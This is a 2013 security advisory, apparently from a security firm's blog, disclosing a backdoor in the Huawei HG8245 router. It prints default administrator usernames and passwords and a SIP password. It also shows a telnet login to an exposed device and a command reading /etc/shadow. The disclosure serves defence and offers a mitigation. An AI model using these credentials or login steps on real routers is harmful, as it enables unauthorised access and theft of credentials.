Huawei HG8245 backdoor and remote access

Huawei HG8245 backdoor and remote access

Posted on Dec 09 2013   |  Plain text version


The Huawei HG8245 ONT, firmware version V1R006C00S100 which provides cellular services, contains 3 severe vulnerabilities: two administrator accounts enabled by default and a public administration interface exposed to the Internet.


Model: Huawei HG8245
Hardware version: 130C4600
Software version: V1R006C00S100
Date of publication: 12/09/2013
Severity: Very High
Solution: Disable WAN-side HTTP and Telnet access.
It is not possible to change the default web administrator's password for the user admin.

The backdoor is a web management account enabled by default and the password cannot be changed. In this version the default administrator password is:


Another administrator user exists by default for the telnet service:






WAP(Dopra Linux) # show text /mnt/jffs2/CfgFile_Backup/V100R002C06SPC005B078.xml 

<X_HW_WebUserInfoInstance InstanceID="1" UserName="root" Password="admin" UserLevel="1" Enable="1"/>
<X_HW_WebUserInfoInstance InstanceID="2" UserName="admin" Password="*6P0N4dm1nP4SS*" UserLevel="0" Enable="1"/>
<SIP AuthUserName="44XXXXXXXX" AuthPassword="qpmzxjhjgi">
[email protected]:/$ telnet 187.XX.XX.XX
Trying 187.XX.XX.XX...
Connected to 187.XX.XX.XX.
Escape character is '^]'.

Welcome Visiting Huawei Home Gateway
Copyright by Huawei Technologies Co., Ltd.


BusyBox v1.18.4 (2012-11-05 11:13:36 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

WAP(Dopra Linux) # show text /etc/shadow
Manufacturer:Huawei Technologies Co., Ltd;ey is repeated!                                                                                                               
1970-01-01 00:00:19  [Error] Command 'pppoe_em_ex' is failed to registered because of key is repeated!
1970-01-01 00:00:19  [Error] Command 'pppoe_em_ex' is failed to registered because of key is repeated!
2013-08-31 20:28:35  [Critical] [SWM] Backup CfgFile:Upgrase from V100R002 C06SPC005B078 to V100R006C00SPC100B087                                                                                                                                  
WAP(Dopra Linux) #

Credits for sharing the HG8245 advisory: Kaczinski @ [email protected]

Credits for discovering the vulnerability in HG8247 models: Psymera @

Latest Blog Entries

Belkin Wemo Switch NMap Scripts
Belkin Wemo Switch Smart Plug is a network controlled power outlet. The current firmware version does not requiere authentication to switch the power ON or OFF or to gather information such as nearby wireless networks. Two NMap scripts have been published

Downloading an Application's Entire Source Code Through an Exposed GIT Directory
Website administrators sometimes inadvertently leave an exposed .git directory, from which it is possible to download the entire source code of the web application using just wget and a common server misconfiguration.

credmap: The Credential Mapper
An overview of credmap, an open source penetration testing tool that automates the process of testing for credential reuse. It does so by testing supplied user credentials on known websites and verifies if the password has been reused on any of these.

Latest News

Blackhat EU 2015
Websec participated with two tools at the Blackhat, EU Arsenal held in Amsterdam, NL from the 10-13 of November, 2015. During this event, we introduced our brand new tool "credmap: The Credential Mapper" and also presented an amped-up version of Panoptic.

BSides Vancouver 2015
Websec is proud to announce that we will be attending the 3rd annual edition of BSides Vancouver, a local non-profit information security conference held in the heart of Vancouver, BC on March 16 and 17.